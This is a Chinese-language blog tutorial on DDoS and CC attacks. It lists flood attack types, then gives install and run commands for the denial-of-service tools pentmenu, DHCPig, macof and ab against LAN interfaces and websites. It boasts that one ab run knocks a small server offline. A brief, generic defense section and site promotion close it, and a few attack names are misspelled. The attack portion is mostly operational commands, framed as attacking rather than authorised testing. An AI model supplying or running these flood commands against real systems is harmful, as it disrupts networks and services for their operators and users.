DDoS和CC攻击
文章目录
简介
Denial Of Service 拒绝服务攻击
DOS攻击 == 耗尽资源攻击
DDOS == 分布式攻击
DDoS攻击目的
1.商业恶性竞争
2.勒索敲诈
3.实施报复
攻击类型介绍
| 攻击名称 | 攻击目标 |
|---|---|
| TCP SYN泛洪攻击 | Web服务器 |
| CC攻击 | Web服务器 |
| UDO flood | 各种服务器 |
| ICMP flood | 各种服务器 |
| Dhcp flooding | DHCO服务器 |
| Mac flooding | 交换机 |
DDoS与CC攻击示例
1.Pentmenu
流量泛洪攻击
原理:软件一直会给目标地址发送流量包,使其网路堵塞,资源耗尽.
#软件
pentmenu
#功能
包含大部分 Flooding攻击模块
#使用kali
#从github上克隆需要的工具
git clone https://github.com/GinjaChris/pentmenu
#进入并且启动工具
cd pentmenu && ./pentmenu
#进入后选择第二个选项DOS
`可以选择相应的服务进行攻击`
2.DHCPig
局域网&内网攻击工具
原理:耗尽局域网&内网中的地址,使其一个小时内上不了网.
#软件
dhcpig
#功能
DHCP flood攻击
#下载并且安装插件
git clone https://github.com/secdev/scapy
解压scapy-master.zip并进入
python setup.py install 安装
##下载并且安装工具
git clone https://github.com/kamorin/DHCPig
解压:dhcpig-master.zip并进入解压目录
python setup.install 安装
#使用方法
pig.py eth0
3.MacOf
交换机MAC地址泛洪
原理:一秒钟会占用攻击目标交换机20000个MAC地址
#软件
macof
#功能
MAC flood(攻击)
#插件
scapy
#下载并且安装插件
git clone https://github.com/secdev/scapy
解压scapy-master.zip并进入
python setup.py install 安装
#下载工具
git clone https://github.com/whitewinterwolf/macof.py
#使用方法
python macof.py -i eth0
4.Ab
网站压力测试工具
扫描二维码关注公众号,回复:
14835008 查看本文章
原理:ab命令会创建多个并发访问线程,模拟多个访问者同时对某一URL地址进行访问.
#软件
ab
#功能
CC攻击与网页压力测试,kali基本自带
#使用方法
ab -c 10 -n 100 https://x.x.x.x
#参数
-n:在测试会话中所有执行的请求个数,默认时,仅执行一个请求.
-c:一次产生的请求个数,默认是一次一个.
-t:测试锁进行的最大秒数.
#测试
ab -c 1000 -n 1000 -t 100 https://www.xxxx.com/
实测,1核2G服务器,直接可以打死,CPU直线飙升至百分之百
防御DDoS方法
DDoS是目前最凶猛,最难防御的网络攻击之一.
现实情况是,这个世界级难题还没有完美的,彻底的解决办法.
1.网络设备设施
1.扩充带宽硬抗.
2.使用硬件防火墙.
3.选择高性能设备.
2.有效的抗DDoS思想及方案
1.服务器负载均衡
2.CDN流量清洗
3.预防为主
1.筛查系统漏洞
2.过滤不必要的服务和端口
3.系统资源优化
总结
更多技术文章,请访问 www.linuxhy.top 技术分享吧,详细学习!!!